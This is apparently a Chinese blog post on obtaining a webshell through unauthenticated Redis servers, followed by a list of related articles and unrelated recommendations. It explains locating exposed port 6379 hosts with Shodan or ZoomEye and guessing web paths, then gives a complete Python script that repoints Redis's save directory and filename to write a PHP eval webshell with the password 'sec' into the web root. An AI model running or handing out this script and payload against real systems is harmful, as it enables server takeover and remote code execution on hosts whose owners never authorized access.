Redis默认端口是6379,可以通过zoomeye或者shodan来查找开放6379的端口,能收到很多对外开放6379端口的ip,而且绝大部门是未授权访问的,因为默认redis是未授权访问。但是还有一先决条件是该ip开放web服务,也就是开放如常见的80端口等,满足这两个条件你就有可能getshell。但是还有最麻烦的一件事是,你必须要知道网站web路径。这边只能靠网站报错泄漏路径,phpinfo文件为删除,文件包含漏洞等,不然只能靠猜了,比如iis服务器的路径c:/inetpub/wwwroot等,linux服务器/var/www, /var/www/html等。

  • 可以用redis-cli客户端连上redis服务器
  • 然后可以用info验证是否有信息
  • 通过设置路径,设置webshell名字和内容getshell

总结一下,redis getshell条件

  • redis可以未授权访问,或者弱口令访问
  • redis服务器还开放了web服务
  • 知道web服务器的路径

以下还有一个redis getshell的脚本

#!/usr/bin/env python

# coding=utf8
# author=Cy3ber http://www.cy3ber.com import redis
import sys def log(text):
print '[*]------' + text def getshell(ip='127.0.0.1', pt=6379, webdir='/var/www/', socket_timeout=10):
try:
r = redis.StrictRedis(host=ip, port=pt)
if r.config_set('dir', webdir) == True and r.config_set('dbfilename', 'safe.php')
== True:
log('set shell on %safe.php sucsessed' % (webdir))
else:
log('set shell dir failed')
sys.exit(1)
if r.set('myshell', "<?php @eval($_POST['sec']);?>") == True:
log('set eval sucsessed')
else:
log('set eval failed')
sys.exit(1)
if r.save() == True:
log('save shell as %safe.php sucsessed password is "sec"'%(webdir))
log('getshell sucsessed please check')
else:
log('getshell failed')
except:
log('error') if __name__ == '__main__':
if len(sys.argv) <> 4:
print "\n+-----------------------------+"
print "| JbossGetshell |"
print "| Cy3ber - cy3ber.com |"
print "| Email:webmaster@cy3ber.com |"
print "+-----------------------------+\n"
print 'Usage:python redisgetshell.py ip port webdir'
print "explame:python redisgetshell.py 10.0.18.1 6379 /data/web/"
sys.exit(1) else:
getshell(ip=sys.argv[1],pt=sys.argv[2],webdir=sys.argv[3])

Redis Getshell总结的更多相关文章

  1. 记一次Redis+Getshell经验分享

    前言: 当我们接到一个授权渗透测试的时候,常规漏洞如注入.文件上传等尝试无果后,扫描端口可能会发现意外收获. 知己知彼乃百战不殆,Redis介绍: 简单来说 redis 就是一个Key-Value类型 ...

  2. SSRF漏洞分析与利用

    转自:http://www.4o4notfound.org/index.php/archives/33/ 前言:总结了一些常见的姿势,以PHP为例,先上一张脑图,划√的是本文接下来实际操作的 0x01 ...

  3. SSRF-php初探

    0x00 前言 1)    SSRF的概念很好理解,请自行百度. 2)    JAVA/PHP/PYTHON都存在SSRF漏洞(至于其他语言的情况,了解粗浅尚不得知). 3)    SSRF的利用方式 ...

  4. weblogic ssrf 漏洞笔记

    CVE-2014-4210 Oracle WebLogic web server即可以被外部主机访问,同时也允许访问内部主机.比如有一个jsp页面SearchPublicReqistries.jsp, ...

  5. Pikachu靶场SSRF学习

    下载Pikachu靶场:https://github.com/zhuifengshaonianhanlu/pikachu Windows用phpstudy也行,记得要改config.inc文件 打开S ...

  6. ATT&CK系列一 知识点总结

    一.环境搭建1.环境搭建测试2.信息收集二.漏洞利用3.漏洞搜索与利用4.后台Getshell上传技巧5.系统信息收集6.主机密码收集三.内网搜集7.内网--继续信息收集8.内网攻击姿势--信息泄露9 ...

  7. redis未授权访问getshell

    redis未授权访问的问题一年前就爆了,当时刚开始学安全,还不太懂.今天借着工作的机会来搞一把,看看能不能拿下一台服务器.其实前几天就写好了一直想找个实际环境复现一下,一直没有找到,只说下大致思路. ...

  8. Redis主从复制getshell技巧

    Redis未授权漏洞常见的漏洞利用方式: Windows下,绝对路径写webshell .写入启动项. Linux下,绝对路径写webshell .公私钥认证获取root权限 .利用contrab计划 ...

  9. redis未授权getshell的4种方式

    前言 redis未授权漏洞或弱口令一直是很有用的渗透突破口,最近正好闲的无事就拿redis来测试一些,做一个简单的收集,方便自己日后的回顾. 漏洞描述 Redis 默认情况下,会绑定在 0.0.0.0 ...

随机推荐

  1. JSP实现系统登录

    计算机通过统一资源定位符实现资源访问,URL:Uriform Resource Locator Tomcat服务器的目录结构 /bin:存放各种平台下用于启动和停止Tomcat的脚本文件 /conf: ...

  2. response中文乱码问题

    1.要确定I代码的编码格式为UTF-8 2.乱码原因:浏览器和服务器的编码格式不同: 服务器的默认编码为:ISO-8859-1,如果浏览器的编码不是ISO-8859-1,就会出现乱码: public ...

  3. 一文搞懂 deconvolution、transposed convolution、sub-­pixel or fractional convolution

    目录 写在前面 什么是deconvolution convolution过程 transposed convolution过程 transposed convolution的计算 整除的情况 不整除的 ...

  4. Oracle学习入门

    让学习成为一种习惯!

  5. [C++]类的设计(2)——拷贝控制(拷贝控制和资源管理)

      1.类的行为分类:看起来像一个值:看起来想一个指针.     1)类的行为像一个值,意味着他应该有自己的状态.当我们拷贝一个像值的对象时,副本和原对象是完全独立的.改变副本不会对原有对象有任何影响 ...

  6. Python中的MRO(方法解析顺序)[转载]

    本文转载至: http://hanjianwei.com/2013/07/25/python-mro/ 对于支持继承的编程语言来说,其方法(属性)可能定义在当前类,也可能来自于基类,所以在方法调用时就 ...

  7. Http协议基础内容

    1.Http协议是什么协议? 客户端和服务器之间的数据传输的格式规范,简称"超文本传输协议". 2.什么是Http协议无状态协议?怎么解决Http协议无状态协议? 1)无状态协议对 ...

  8. Roman and Browser-罗曼的浏览器 CodeForce1100A 暴力

    题目链接:Roman and Browser 题目原文 This morning, Roman woke up and opened the browser with 

  9. 在vscode中配置python环境

    1.安装vscode和python3.7(安装路径在:E:\Python\Python37): 2.打开vscode,在左下角点击设置图标选择setting,搜索python path,在该路径下选择 ...

  10. 基于操作系统原理的Red Hat Linux的基本操作

    一.实验目的 1.了解Linux操作系统的启动与登录方法. 2.掌握Red Hat Linux图形用户界面下的基本操作. 3.学会Red Hat Linux基本设置. 二.实验内容 1. 登录 2. ...